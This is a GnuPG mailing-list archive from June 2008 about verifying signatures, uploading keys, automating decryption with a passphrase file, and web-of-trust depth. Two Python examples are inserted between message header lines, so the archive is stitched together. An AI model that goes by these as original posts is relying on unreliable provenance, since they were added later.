Message-ID: <48471349.4060908@gmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Arnaud Ongenae wrote:
> You may give a try to FireGPG (an extension to Firefox) that allows you to
> use gpg in the Gmail interface... it's really easy
>
> http://getfiregpg.org/index.php?page=home&lang=en
>
> It will show if the mail are signed even if it's not your mail is not
> configured for gpg so you will be able to see if gpg is well
> configured, then we can try to find out other solution

I think it may be working now. I tried everything over from scratch on my gmail account and it looks like it found my key. Is there a way to test this with you guys on the list?

_______________________________________________
Gnupg-users mailing list
Gnupg-users at gnupg.org
http://lists.gnupg.org/mailman/listinfo/gnupg-users

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFIRxNJkox9aWcei0oRAlxrAJ4xlS1fGx4BCoEbyLS+9tM5bQN9XwCeLE/t
xJPxlA2yD6oGctR1pkJjQeA=
=La8n
-----END PGP SIGNATURE-----

From phil-gpg at tinsleyviaduct.com Thu Jun 5 00:59:10 2008
From: phil-gpg at tinsleyviaduct.com (Phil Reynolds)
Date: Wed, 4 Jun 2008 23:59:10 +0100
Subject: Wildcards in uids?
In-Reply-To: <20080604191800.GC5992@jabberwocky.com>
References: <20080604161300.esjouxce7r44c8o4@topdeck.tinsleyviaduct.com> <20080604170840.GB5992@jabberwocky.com> <20080604182300.GA8245@tinsleyviaduct.com> <20080604191800.GC5992@jabberwocky.com>
Message-ID: <20080604225909.GA28216@tinsleyviaduct.com>

On Wed, Jun 04, 2008 at 03:18:00PM -0400, David Shaw wrote:
> I think I did understand the query. You have email addresses like
> "myaddress-foo at example.com", "myaddress-bar at example.com", and so on.
> The question was is a "catch all suffixes" UID possible. The answer
> to that question is no.
>
> That said, I'm not sure why you think this is a necessary thing to
> do.

Should I wish to sign, or should somebody wish to send me something encrypted, to some address with a suffix, my key will need a uid containing that suffix, as far as I can see.

Therefore, should it prove necessary, I will presumably have to add such uids as necessary to the key.

On the whole, I think this will probably only rarely, if ever, be needed. But, if it is, at least I know now.

--
Phil Reynolds         o ____  mail: phil-gpg at tinsleyviaduct.com
                     |L_ \ /  Web: http://www.tinsleyviaduct.com/phil/
                    (_)- \/   Waltham 66, Emley Moor 69, Droitwich 79, Windows 95

From reynt0 at cs.albany.edu Thu Jun 5 02:41:21 2008
From: reynt0 at cs.albany.edu (reynt0)
Date: Wed, 4 Jun 2008 20:41:21 -0400 (EDT)
Subject: Wildcards in uids?
In-Reply-To: <20080604225909.GA28216@tinsleyviaduct.com>
References: <20080604161300.esjouxce7r44c8o4@topdeck.tinsleyviaduct.com> <20080604170840.GB5992@jabberwocky.com> <20080604182300.GA8245@tinsleyviaduct.com> <20080604191800.GC5992@jabberwocky.com> <20080604225909.GA28216@tinsleyviaduct.com>
Message-ID:

On Wed, 4 Jun 2008, Phil Reynolds wrote:
> On Wed, Jun 04, 2008 at 03:18:00PM -0400, David Shaw wrote:
>> I think I did understand the query. You have email addresses like
>> "myaddress-foo at example.com", "myaddress-bar at example.com", and so on.
>> The question was is a "catch all suffixes" UID possible. The answer
>> to that question is no.
>>
>> That said, I'm not sure why you think this is a necessary thing to
>> do.

FWIW, I would think you would want to separate signing as well as emailing, to as much as possible maintain isolation and confidentiality of whatever you are doing with those suffixed email addresses?

From John at Mozilla-Enigmail.org Thu Jun 5 04:17:04 2008
From: John at Mozilla-Enigmail.org (John Clizbe)
Date: Wed, 04 Jun 2008 21:17:04 -0500
Subject: Am I Missing Something?
In-Reply-To: <48471349.4060908@gmail.com>
References: <483EC791.7050100@mac.com> <483EFB33.1080607@bellsouth.net> <83713a650806041109i69c9dfffleef777e16e0e0723@mail.gmail.com> <83713a650806041125h5bf5c694l36f7c6dacd04e38e@mail.gmail.com> <48471349.4060908@gmail.com>
Message-ID: <48474CA0.3090403@Mozilla-Enigmail.org>

Carlos Williams wrote:
> I think it may be working now. I tried everything over from scratch on
> my gmail account and it looks like it found me key. Is there a way to
> test this with you guys on the list?

It /looks/ like Enigmail is working. Looks is the best anyone can tell at the moment. Had you sent your key to the keyservers, folks could've verified the signature you had on this last message.

Until then, ie until it is available:

1) See if the original message in your Sent folder verifies OK

2a) Send yourself a signed message and see if that verifies when you receive it.

2b) You can also send yourself an encrypted message.

Until your public key is available, there is nothing others can help you with

--
John P. Clizbe                      Inet: John (a) Mozilla-Enigmail.org
You can't spell fiasco without SCO. hkp://keyserver.gingerbear.net
"what's the key to success?" / "two words: good decisions."
"what's the key to good decisions?" / "one word: experience."
"how do i get experience?" / "two words: bad decisions."
"Just how do the residents of Haiku, Hawai'i hold conversations?"

From gukgukcommunity at yahoo.com Thu Jun 5 05:13:52 2008
From: gukgukcommunity at yahoo.com (guk guk)
Date: Wed, 4 Jun 2008 20:13:52 -0700 (PDT)
Subject: Automating Decryption using gpg --batch --passphrase-file or gpg --batch --passphrase-fd 0
Message-ID: <111106.32895.qm@web46001.mail.sp1.yahoo.com>

Hi Hardeep!

Thanks for your reply. I did try your suggestion and it didn't work. It is still throwing the same error. Can you tell more about the key setup? What kind of procedure I need to follow so I can run gpg in SQL Job?

Thanks

----- Original Message ----
From: Hardeep Singh
To: guk guk
Sent: Wednesday, June 4, 2008 6:27:09 PM
Subject: Re: Automating Decryption using gpg --batch --passphrase-file or gpg --batch --passphrase-fd 0

Hi

The first method is incorrect. Correct usage of --passphrase-fd is as below:

gpg --batch --decrypt --passphrase-fd 0 --output output.csv output.csv.pgp

wrote:
>
> Hi !
>
> I tried to automate decryption of pgp files by running this command line in
> windows xp
> gpg --batch --passphrase-fd 0 < passphrase.txt --output "OUTPUT.CSV"
> --decrypt "OUTPUT.CSV.pgp"
> or
> gpg --batch --passphrase-file passphrase.txt --output "OUTPUT.CSV"
> --decrypt "OUTPUT.CSV.pgp"
>
> but it's always failed.
> It always throw an error
> gpg: encrypted with 2048-bit RSA key, ID , created 2008-05-08
> gpg: public key decryption failed: bad passphrase
> gpg: decryption failed: secret key not available
>
> I'm using gnupg 1.4.9.
> Can anybody help me please?
> Thanks
>

--
Hardeep Singh

From apple at royds.net Thu Jun 5 05:09:20 2008
From: apple at royds.net (Bill Royds)
Date: Wed, 4 Jun 2008 23:09:20 -0400
Subject: Am I Missing Something?
In-Reply-To: <48471349.4060908@gmail.com>
References: <483EC791.7050100@mac.com> <483EFB33.1080607@bellsouth.net> <83713a650806041109i69c9dfffleef777e16e0e0723@mail.gmail.com> <83713a650806041125h5bf5c694l36f7c6dacd04e38e@mail.gmail.com> <48471349.4060908@gmail.com>
Message-ID: <6DF21093-AF5A-4F7A-AC7E-5BF894597BD9@royds.net>

On 4-Jun-08, at 18:12 , Carlos Williams wrote:
> I think it may be working now. I tried everything over from scratch on
> my gmail account and it looks like it found me key. Is there a way to
> test this with you guys on the list?

Your message was signed but your key does not seem to be in any public key server. You need to send it to a keyserver so others can use your public key.

use gnupg2 --keyserver hkp://subkeys.pgp.net --send-keys [key IDs]

Similar to --export but sends the keys to a keyserver. Fingerprints may be used instead of key IDs. Option --keyserver must be used to give the name of this keyserver. Don't send your complete keyring to a keyserver --- select only those keys which are new or changed by you.

From faramir.cl at gmail.com Thu Jun 5 06:21:51 2008
From: faramir.cl at gmail.com (Faramir)
Date: Thu, 05 Jun 2008 00:21:51 -0400
Subject: Am I Missing Something?
In-Reply-To: <6DF21093-AF5A-4F7A-AC7E-5BF894597BD9@royds.net>
References: <483EC791.7050100@mac.com> <483EFB33.1080607@bellsouth.net> <83713a650806041109i69c9dfffleef777e16e0e0723@mail.gmail.com> <83713a650806041125h5bf5c694l36f7c6dacd04e38e@mail.gmail.com> <48471349.4060908@gmail.com> <6DF21093-AF5A-4F7A-AC7E-5BF894597BD9@royds.net>
Message-ID: <484769DF.3000204@gmail.com>

Bill Royds wrote:
>
> On 4-Jun-08, at 18:12 , Carlos Williams wrote:
>
>> I think it may be working now. I tried everything over from scratch on
>> my gmail account and it looks like it found me key. Is there a way to
>> test this with you guys on the list?
>
> Your message was signed but your key does not seem to be in any public
> key server. You need to send it to a keyserver so others can use your
> public key.
>
> use gnupg2 --keyserver hkp://subkeys.pgp.net --send-keys [key IDs]
>
>
> Similar to --export but sends the keys to a keyserver. Fingerprints may
> be used instead of key
> IDs. Option --keyserver must be used to give the name of this keyserver.
> Don't send your complete
> keyring to a keyserver --- select only those keys which are new or
> changed by you.

*IF* he is using enigmail, it would be easier to open the key management window, right click the key, and select "upload to key server"...

From John at Mozilla-Enigmail.org Thu Jun 5 06:35:06 2008
From: John at Mozilla-Enigmail.org (John Clizbe)
Date: Wed, 04 Jun 2008 23:35:06 -0500
Subject: Automating Decryption using gpg --batch --passphrase-file or gpg --batch --passphrase-fd 0
In-Reply-To: <521129.96578.qm@web46014.mail.sp1.yahoo.com>
References: <521129.96578.qm@web46014.mail.sp1.yahoo.com>
Message-ID: <48476CFA.8080106@Mozilla-Enigmail.org>

guk guk wrote:
> I tried to automate decryption of pgp files by running this command line in
> windows xp
> gpg --batch --passphrase-fd 0 < passphrase.txt --output "OUTPUT.CSV"
> --decrypt "OUTPUT.CSV.pgp"
> or
> gpg --batch --passphrase-file passphrase.txt --output "OUTPUT.CSV"
> --decrypt "OUTPUT.CSV.pgp"

The general form is
gpg --batch --passphrase-file --output --decrypt

The first is wrong
gpg --batch --passphrase-fd 0 --output <> --decrypt <> <

The second looks correct, the quotes around the filenames are generally unneeded on Win32, but shouldn't break things.

> but it's always failed. It always throw an error
> gpg: encrypted with 2048-bit RSA key, ID , created 2008-05-08
> gpg: public key decryption failed: bad passphrase

The bad passphrase error points to your passphrase file being at fault.

Check that your passphrase file is the same exact length as the passphrase. Use DIR at a command prompt or any program that will do a hex dump for you. A (hex 0x0d0a) at the end of the passphrase in the file will cause the passphrase to fail. (0x0a) alone seems to work as well as no line ending at all. notepad can be used to create the file without line endings.

These problems go away by removing the passphrase from the key. And remove the charade that things are all that secure when the passphrase is in a file readable by anyone with enough access.

--
John P. Clizbe                      Inet: John (a) Mozilla-Enigmail.org
You can't spell fiasco without SCO. PGP/GPG KeyID: 0x608D2A10/0x18BB373A
"what's the key to success?" / "two words: good decisions."
"what's the key to good decisions?" / "one word: experience."
"how do i get experience?"
/ "two words: bad decisions."
"Just how do the residents of Haiku, Hawai'i hold conversations?"

From shavital at mac.com Thu Jun 5 08:02:42 2008
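The passphrase-file check John Clizbe describes in the message above, as an added example that is not part of the original post: a Python script that reports a file's length, its line ending and (an addition here, not from the thread) a UTF-8 byte-order mark, and can rewrite the file so it holds only the first line's bytes. The file names and the sample passphrase are constructed.

```python
"""Added example: inspect a file meant for `gpg --batch --passphrase-file`."""
import os
import tempfile

UTF8_BOM = b"\xef\xbb\xbf"  # written by some editors when saving as UTF-8


def split_first_line(body):
    """Return (first_line, line_ending, rest); gpg reads only the first line."""
    i = body.find(b"\n")
    if i == -1:
        return body, "none", b""
    if i > 0 and body[i - 1:i] == b"\r":
        return body[:i - 1], "CRLF", body[i + 1:]
    return body[:i], "LF", body[i + 1:]


def inspect_passphrase_bytes(data):
    """Describe the bytes that surround the passphrase, without revealing it."""
    has_bom = data.startswith(UTF8_BOM)
    body = data[len(UTF8_BOM):] if has_bom else data
    first, ending, rest = split_first_line(body)
    return {
        "file_length": len(data),          # what DIR would show
        "passphrase_length": len(first),   # what it should show
        "line_ending": ending,
        "bom": has_bom,
        "bytes_after_first_line": len(rest),
    }


def problems(report):
    """List findings; only the CRLF case comes from the thread itself."""
    found = []
    if report["line_ending"] == "CRLF":
        found.append("CRLF (0x0d0a) ending: reported above to fail with gpg 1.4.9")
    if report["bom"]:
        found.append("UTF-8 byte-order mark before the passphrase")
    if report["bytes_after_first_line"]:
        found.append("bytes after the first line are not part of the passphrase")
    return found


def clean_passphrase_file(src, dst):
    """Write only the passphrase bytes to dst (mode 0600); return their count."""
    with open(src, "rb") as fh:
        data = fh.read()
    body = data[len(UTF8_BOM):] if data.startswith(UTF8_BOM) else data
    first, _, _ = split_first_line(body)
    fd = os.open(dst, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "wb") as out:
        out.write(first)
    return len(first)


if __name__ == "__main__":
    samples = {  # constructed sample files, not real passphrases
        "crlf.txt": b"correct horse\r\n",
        "lf.txt": b"correct horse\n",
        "bare.txt": b"correct horse",
        "bom.txt": UTF8_BOM + b"correct horse\r\n",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, data in samples.items():
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(data)
            report = inspect_passphrase_bytes(data)
            print(name, report, problems(report) or "ok")
        kept = clean_passphrase_file(os.path.join(tmp, "bom.txt"),
                                     os.path.join(tmp, "clean.txt"))
        print("clean.txt holds", kept, "bytes")
```
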
From: shavital at mac.com (Charly Avital)
Date: Thu, 05 Jun 2008 02:02:42 -0400
Subject: Am I Missing Something?
In-Reply-To: <48471349.4060908@gmail.com>
References: <483EC791.7050100@mac.com> <483EFB33.1080607@bellsouth.net> <83713a650806041109i69c9dfffleef777e16e0e0723@mail.gmail.com> <83713a650806041125h5bf5c694l36f7c6dacd04e38e@mail.gmail.com> <48471349.4060908@gmail.com>
Message-ID: <48478182.2090106@mac.com>

Carlos Williams wrote the following on 6/4/08 6:12 PM:
[...]
> I think it may be working now. I tried everything over from scratch on
> my gmail account and it looks like it found me key. Is there a way to
> test this with you guys on the list?

Carlos,

As you have already been answered by John, your e-mail looks like a signed one, and an attempt to verify the signature outputs:

gpg: Signature made Wed Jun 4 18:12:25 2008 EDT using DSA key ID 671E8B4A
gpg: requesting key 671E8B4A from hkp server keyserver.linux.it
gpg: no valid OpenPGP data found.
gpg: Total number processed: 0
gpg: Can't check signature: No public key

I have tried to find your key on key servers other than the one indicated above, without results. The only key I have found who is listed to someone named carlos williams is:
carlos williams 1024 bit DSA key 8C73D5AB, created: 1997-08-27

That's not the key used to sign your message.

If you want recipients of your signed e-mails to be able to verify your signature, you should upload your public key to a public server, or to send your key directly and exclusively to your selected correspondents.

In the present case, this is a mailing list, so either you upload your key to a keyserver, or you attach your public key (OpenPGP/Attach My Public Key) to a message posted to the list, which will leave out people who are not subscribed to this list.

Best regards,
Charly

MacOS 10.5.3 - MacBook Intel C2Duo - GnuPG 1.4.9 - GPG2 2.0.9 - Thunderbird 2.0.0.14 - Enigmail 0.96a

From JPClizbe at tx.rr.com Thu Jun 5 09:04:59 2008
From: JPClizbe at tx.rr.com (John Clizbe)
Date: Thu, 05 Jun 2008 02:04:59 -0500
Subject: Am I Missing Something?
In-Reply-To: <48478182.2090106@mac.com>
References: <483EC791.7050100@mac.com> <483EFB33.1080607@bellsouth.net> <83713a650806041109i69c9dfffleef777e16e0e0723@mail.gmail.com> <83713a650806041125h5bf5c694l36f7c6dacd04e38e@mail.gmail.com> <48471349.4060908@gmail.com> <48478182.2090106@mac.com>
Message-ID: <4847901B.9060908@tx.rr.com>

Charly Avital wrote:
> If you want recipients of your signed e-mails to be able to verify your
> signature, you should upload your public key to a public server, or to
> send your key directly and exclusively to your selected correspondents.
>
> In the present case, this is a mailing list, so either you upload your
> key to a keyserver, or you attach your public key (OpenPGP/Attach My
> Public Key) to a message posted to the list, which will leave out people
> who are not subscribed to this list.

The bandwidth-friendly solution is to use the keyservers. Then those who wish to verify your signature or send you encrypted traffic can retrieve it.

--
John P. Clizbe                   Inet: JPClizbe (a) tx DAWT rr DAHT con
Ginger Bear Networks             hkp://keyserver.gingerbear.net
"Be who you are and say what you feel because those who mind don't matter and those who matter don't mind." - Dr Seuss, "Oh the Places You'll Go"

From ml at mareichelt.de Thu Jun 5 09:38:54 2008
From: ml at mareichelt.de (markus reichelt)
Date: Thu, 05 Jun 2008 09:38:54 +0200
Subject: problem with forgotten passphrase, no revocation certificate available.
In-Reply-To: <48457AE0.7050705@gmail.com>
References: <4843CFFB.1060401@gmail.com> <48457AE0.7050705@gmail.com>
Message-ID: <20080605073854.GF4162@tatooine.rebelbase.local>

* Faramir wrote:
> > So, here is the question: Can that public key cause problems,
> > if I associate another key with the same email account?
> I have good news (good for me at least): I checked the gpg
> installed in my USB flash memory, and I found the private key (or
> at least, the private subkeys for that key), and since I had not
> forgotten that passphrase, I could revoke the key.

well, next time give http://www.vanheusden.com/nasty/ a chance ;p

> Anyway, I still would like to know the answers for these
> questions...

Nope, cos it's about key IDs, not about email addresses used.

--
left blank, right bald

From sickuser at gmail.com Tue Jun 3 21:20:34 2008
From: sickuser at gmail.com (gabrix)
Date: Tue, 3 Jun 2008 21:20:34 +0200
Subject: No public key to verify signature
Message-ID: <200806032120.42778.gabrix@gabrix.ath.cx>

I run debian etch and kmail is my mail application.
All mail I get signed by gnupg coming from mailing lists, has this error:

"Message was signed on 2008-06-03 14:15 with unknown key 0x123456789ABCDFGH.
The validity of the signature cannot be verified.
Status: No public key to verify the signature"

It doesn't happen with other mail coming from my contacts or friends. I was wondering what it was due this error, thanks

--
#######################################################################
Email: root at gabrix.ath.cx
MSN: sickuser at gmail.com
Ekiga: gabrihell at ekiga.net
Skype: gabx666
jabber: gabrihell at jabber.linux.it

My Gnupg pub key : https://www.gabrix.ath.cx/mynewpubkey.asc
--------------------------------------------------------------
sec 1024D/6C71F528 2008-03-18
Key fingerprint = AD40 8FC1 F8C0 60E1 608E C136 8080 9773 6C71 F528
uid Gabriele (PRIMA NUOVA SERIE)
ssb 4096g/63E0E427 2008-03-18

------------------------------------------------------------------------
                           | .''`.  ** Debian GNU/Linux **
Gabriele S.                | : :' : The universal
https://www.gabrix.ath.cx/ | `. `'  Operating System
                           | `-     http://www.debian.org/

From aongenae at gmail.com Thu Jun 5 22:52:36 2008
From: aongenae at gmail.com (Arnaud Ongenae)
Date: Thu, 5 Jun 2008 22:52:36 +0200
Subject: No public key to verify signature
In-Reply-To: <200806032120.42778.gabrix@gabrix.ath.cx>
References: <200806032120.42778.gabrix@gabrix.ath.cx>
Message-ID: <83713a650806051352k18c56cdi1b4f0c202a96e8bf@mail.gmail.com>

2008/6/3 gabrix :
> I run debian etch and kmail is my mail application.
> All mail i get signed by gnupg coming from mailing lists , has this error:
>
> "Message was signed on 2008-06-03 14:15 with unknown key 0x123456789ABCDFGH.
> The validity of the signature cannot be verified.
> Status: No public key to verify the signature"

With this error, I suppose that your system doesn't know our signature. You have to retrieve them from keyserver.

>
> It doesn't happen with other mail coming from my contacts or friends i was
> wondering what it was due this error , thanks

I guess that you have imported your friend's signature, don't you?

> --
> #######################################################################
> Email: root at gabrix.ath.cx
>
> MSN: sickuser at gmail.com
>
> Ekiga: gabrihell at ekiga.net
>
> Skype: gabx666
>
> jabber: gabrihell at jabber.linux.it
>
>
>
> My Gnupg pub key : https://www.gabrix.ath.cx/mynewpubkey.asc
> --------------------------------------------------------------
> sec 1024D/6C71F528 2008-03-18
> Key fingerprint = AD40 8FC1 F8C0 60E1 608E C136 8080 9773 6C71
> F528
> uid Gabriele (PRIMA NUOVA SERIE)
> ssb 4096g/63E0E427 2008-03-18
>
>
>
> ------------------------------------------------------------------------
> | .''`. ** Debian GNU/Linux **
> Gabriele S. | : :' : The universal
> https://www.gabrix.ath.cx/ | `.
`' Operating System
> | `- http://www.debian.org/
>
>

Is your mail client configured to retrieve automatically key on keyserver? I don't know for Kmail but I think that this kind of feature exists on other mail client...

_-Arnaud-_

From george.davidescu at gmail.com Fri Jun 6 22:26:19 2008
From: george.davidescu at gmail.com (bezna)
Date: Fri, 6 Jun 2008 13:26:19 -0700 (PDT)
Subject: max-cert-depth and "chains of trust" in GPG
Message-ID: <17700504.post@talk.nabble.com>

I'm a bit confused as to how trust is handled in GPG, or maybe PGP in general. It seems to me that it is impossible to establish long chains of trust in GPG, because trust databases are kept hidden from other users and ownertrust values have to be set by the user himself; as a result of this the maximum depth of a "chain of trust" seems to be 2: the owner (depth 0), his trusted introducer (depth 1) and the person whose certificate is validated by the trusted introducer (depth 1).

When I got into GPG I was under the impression that you could rely on long "chains of trust" or chains of trusted introducers in order to validate a certificate at the end of the chain. However, as Abdul-Rahman points out (http://www.wim.uni-koeln.de/uploads/media/The_PGP_Trust_Model.pdf), this does not seem to be the case. Let me illustrate with an example.

Say Alice signs Bob's key, and Bob signs Charlie's key. Now say Alice fully trusts Bob. Suppose also that Bob fully trusts Charlie. Because of her trust in Bob, Charlie's certificate appears valid to Alice. The chain might look something like this (note that the arrow represents both a valid signature and full trust given by the person from whom the arrow originates to the person at the tip of the arrow).

        A --> B --> C
Depth:  0     1     2
Valid:  y     y     y

Recall that Bob fully trusts Charlie. Now suppose Charlie had signed Dale's certificate. In theory, this could lead to the establishment of a "chain of trust" where Dale's certificate appears valid to Alice, who trusts Bob's competence in assessing the authenticity of a certificate, who in turn trusts Charlie, who vetted and signed Dale's certificate. How trustworthiness should be computed as we progress down such a chain is another issue.
        A--> B--> C--> D
Depth:  0    1    2    3
Valid:  y    y    y    y

However, this does not happen in GPG. Because Alice does not have access to Bob's trust database (unless he exports it and gives it to her), she has no way of knowing who Bob trusts and to what extent. Thus, she can only rely on the signatures made by Bob himself to determine if a certificate is valid, but not Bob's trusted introducers because she has no idea who they are.

        A--> B--> C--> D
Depth:  0    1    2    3
Valid:  y    y    y    ?

A workaround to this problem is for Alice to fully trust Charlie (who appears valid to her because of Bob's signature) as an introducer, thereby validating Dale's certificate through him. Note that Alice doesn't need to sign Dale's certificate herself to do this. The next illustration shows the situation from Alice's perspective only (IE she has no access to who the other players trust). --> arrows represent both a signature and full trust, while ==> arrows represent only signatures.

A--> B
 \   ||
 |   v
 ---> C==> D

Bob's certificate appears valid to Alice because she signed it. Charlie's certificate is validated because she trusts Bob and Bob signed Charlie's key. Dale's certificate is validated because she trusts Charlie and Charlie has signed Dale's key. Note that the graph tracing the signatures the players have made is different from the above graph of Alice's trust database, keeping in mind that Alice signed Bob, Bob signed Charlie and Charlie signed Dale:

        A==> B==> C==> D
Depth:  0    1    2    3

So for Alice to be able to validate a certificate through someone else's signature, she has to personally trust that someone else; the trust can't transfer through an intermediate.

Ok, now, after all this, which I hope you understood, come the questions. Am I understanding this correctly? Can "chains of trust" have only a depth of one (Alice and the person she trusts) or is there something more?

What does the max-cert-depth parameter refer to? Is that the depth of the "chain of signatures"?
And lastly, how do all these sites and applications that trace a path between your certificate and another person's certificate work? Based on tracing signatures alone? Is it possible to export your trust database to these servers so they will aggregate it into one and take trust as well as signatures into account in determining validity down a chain?

Is there anything out there that incorporates real chains of trust of some substantial length?

Thanks for your assistance and for taking the time to read this.

George

From dshaw at jabberwocky.com Fri Jun 6 23:45:26 2008
From: dshaw at jabberwocky.com (David Shaw)
Date: Fri, 6 Jun 2008 17:45:26 -0400
Subject: max-cert-depth and "chains of trust" in GPG
In-Reply-To: <17700504.post@talk.nabble.com>
References: <17700504.post@talk.nabble.com>
Message-ID: <20080606214526.GA1701@jabberwocky.com>

On Fri, Jun 06, 2008 at 01:26:19PM -0700, bezna wrote:

> However, this does not happen in GPG. Because Alice does not have access to
> Bob's trust database (unless he exports it and gives it to her), she has no
> way of knowing who Bob trusts and to what extent. Thus, she can only rely on
> the signatures made by Bob himself to determine if a certificate is valid,
> but not Bob's trusted introducers because she has no idea who they are.
>
>           A--> B--> C--> D
> Depth:    0    1    2    3
> Valid:    y    y    y    ?

Correct. This is because Alice does not necessarily agree with Bob. The trust decisions are personal, and while Bob might feel that Charlie is a good signer, Alice might not.

> A workaround to this problem is for Alice to fully trust Charlie (who
> appears valid to her because of Bob's signature) as an introducer, thereby
> validating Dale's certificate through him. Note that Alice doesn't need to
> sign Dale's certificate herself to do this.

Yes.

> So for Alice to be able to validate a certificate through someone else's
> signature, she has to personally trust that someone else; the trust can't
> transfer through an intermediate.

Yes. The "classic" trust model requires personal trust.

> Ok, now, after all this, which I hope you understood, come the questions. Am
> I understanding this correctly?

Yes.

> What does the max-cert-depth parameter refer to? Is that the depth of the
> "chain of signatures"?

Yes.

> And lastly, how do all these sites and applications that trace a path
> between your certificate and another person's certificate work? Based on
> tracing signatures alone?

Just signatures.

> Is it possible to export your trust database to these servers so
> they will aggregate it into one and take trust as well as signatures
> into account in determining validity down a chain?

No. As I noted above, the trust database is very dependent on the owner - or put another way, why should you believe my trust database is correct?

> Is there anything out there that incorporates real chains of trust of some
> substantial length?

Yes, there is. There is a different method of signing that does basically what you are looking for here - try a "tsign" (for "trust signature"). A trust signature does the same thing as a regular signature, but also contains the trust information that would have been put in the database. Essentially, it allows you to issue a signature that says "I verified the key belongs to her, and I also trust her to make signatures on my behalf".

See for some examples on how to use it.

David

From decouk at gmail.com Sat Jun 7 23:10:32 2008
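The classic trust model confirmed in the reply above, as an added example (not code from the thread or from GnuPG): a simplified Python model that computes validity from Alice's own trust database only, so Bob's opinion of Charlie never counts. The function name, the depth convention used for max_cert_depth, and the defaults modelled on gpg's --completes-needed and --marginals-needed options are this example's assumptions.

```python
"""Simplified model of the classic OpenPGP trust calculation from this thread.

Validity is computed from one owner's point of view: a key becomes valid when
enough *valid* keys that the owner personally trusts have signed it.  Trust
held by other people (Bob's opinion of Charlie) never enters the calculation.
"""

FULL, MARGINAL = "full", "marginal"


def validate(owner, signatures, ownertrust, max_cert_depth=5,
             completes_needed=1, marginals_needed=3):
    """Return {key: depth} for every key that is valid for `owner`.

    signatures -- set of (signer, signee) pairs: the public signature graph
    ownertrust -- the owner's private trust database: {key: FULL or MARGINAL}

    Depth 0 is the owner's own key, as in the diagrams in the thread.  Treating
    max_cert_depth as "largest depth that may still be validated" is this
    model's convention (an assumption), not a statement about gpg's internals.
    """
    valid = {owner: 0}
    for depth in range(1, max_cert_depth + 1):
        # Introducers: the owner, plus valid keys the owner assigned trust to.
        # A trusted key that is not itself valid cannot introduce anyone.
        introducers = {owner: FULL}
        introducers.update({key: trust for key, trust in ownertrust.items()
                            if key in valid and key != owner})

        # Count signatures from introducers on keys that are not yet valid.
        fulls, marginals = {}, {}
        for signer, signee in signatures:
            if signee in valid or signer not in introducers:
                continue
            tally = fulls if introducers[signer] == FULL else marginals
            tally[signee] = tally.get(signee, 0) + 1

        newly_valid = [key for key in set(fulls) | set(marginals)
                       if fulls.get(key, 0) >= completes_needed
                       or marginals.get(key, 0) >= marginals_needed]
        if not newly_valid:
            break
        for key in newly_valid:
            valid[key] = depth
    return valid


# The chain from the thread: Alice signed Bob, Bob signed Charlie,
# Charlie signed Dale.
CHAIN = {("Alice", "Bob"), ("Bob", "Charlie"), ("Charlie", "Dale")}

if __name__ == "__main__":
    # Alice trusts only Bob: Dale stays unvalidated ("Valid: y y y ?").
    print(validate("Alice", CHAIN, {"Bob": FULL}))
    # The workaround: Alice also trusts Charlie, so Dale becomes valid.
    print(validate("Alice", CHAIN, {"Bob": FULL, "Charlie": FULL}))
    # Same trust, but the signature chain is cut off at depth 2.
    print(validate("Alice", CHAIN, {"Bob": FULL, "Charlie": FULL},
                   max_cert_depth=2))
```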
From: decouk at gmail.com (Andre Amorim)
Date: Sat, 7 Jun 2008 22:10:32 +0100
Subject: One Time Password and GnuPG
Message-ID:

Hello fellow,

I was thinking how to make gnupg more safe when it's running in hostile environments. The main idea is to run my GnuPG on my pen drive as a portable application. I did a quick research and I found GNUPG portable here http://portableapps.com/node/11402 And thunderbird portable and enigmail http://portableapps.com/apps/internet/thunderbird_portable

Then I started thinking: IF the insecure computer has a keylogger? Well, I found Neo's SafeKeys; http://www.aplin.com.au/?page_id=246 That is a virtual keyboard that can send to Enigmail the private key password without typing or using the keyboard. But it is still vulnerable to screenloggers.

So I was thinking whether it is possible to use some kind of One Time Password System .. Something like Perfect Paper Password ... http://www.grc.com/ppp/urlaccess.htm

What do you think, guys?

All the best,
Andre Amorim
--Gpg: 2048R/3E10FF47

From rjh at sixdemonbag.org Sun Jun 8 00:35:44 2008
From: rjh at sixdemonbag.org (Robert J. Hansen)
Date: Sat, 07 Jun 2008 17:35:44 -0500
Subject: One Time Password and GnuPG
In-Reply-To:
References:
Message-ID: <484B0D40.9090307@sixdemonbag.org>

Andre Amorim wrote:
> What do you think, guys?

Search the archives. These ideas keep on popping up time and time again, and the same answers always apply.

If you don't have physical security over your hardware, you don't have anything. You cannot use GnuPG safely on a malicious machine. People keep on trying to invent complex methods that allow them to do this, but it's like trying to make water not wet or bricks not heavy.

From bahamutzero8825 at gmail.com Sun Jun 8 19:22:11 2008
From: bahamutzero8825 at gmail.com (Andrew Berg)
Date: Sun, 08 Jun 2008 17:22:11 +0000
Subject: One Time Password and GnuPG
In-Reply-To: <484B0D40.9090307@sixdemonbag.org>
References: <484B0D40.9090307@sixdemonbag.org>
Message-ID: <484C1543.8090604@gmail.com>

Robert J. Hansen wrote:
> If you don't have physical security over your hardware, you don't have
> anything. You cannot use GnuPG safely on a malicious machine

Exactly. There are keyloggers (both hardware and software), screenloggers, USB drive copy programs, and a lot of other nasty stuff you'll never see coming. If the copy program picks up your key, and a keylogger or screenlogger picks up your passphrase, your key is compromised.

> it's like trying to make water not wet or bricks not heavy.

Bricks can be hollowed out. :P

From eocsor at gmail.com Mon Jun 9 06:00:01 2008
From: eocsor at gmail.com (Roscoe)
Date: Mon, 9 Jun 2008 13:30:01 +0930
Subject: One Time Password and GnuPG
In-Reply-To: <484C1543.8090604@gmail.com>
References: <484B0D40.9090307@sixdemonbag.org> <484C1543.8090604@gmail.com>
Message-ID:

Would a smartcard address this private key compromising problem?

From wk at gnupg.org Mon Jun 9 10:34:35 2008
From: wk at gnupg.org (Werner Koch)
Date: Mon, 09 Jun 2008 10:34:35 +0200
Subject: One Time Password and GnuPG
In-Reply-To: (eocsor@gmail.com's message of "Mon, 9 Jun 2008 13:30:01 +0930")
References: <484B0D40.9090307@sixdemonbag.org> <484C1543.8090604@gmail.com>
Message-ID: <871w37gg6c.fsf@wheatstone.g10code.de>

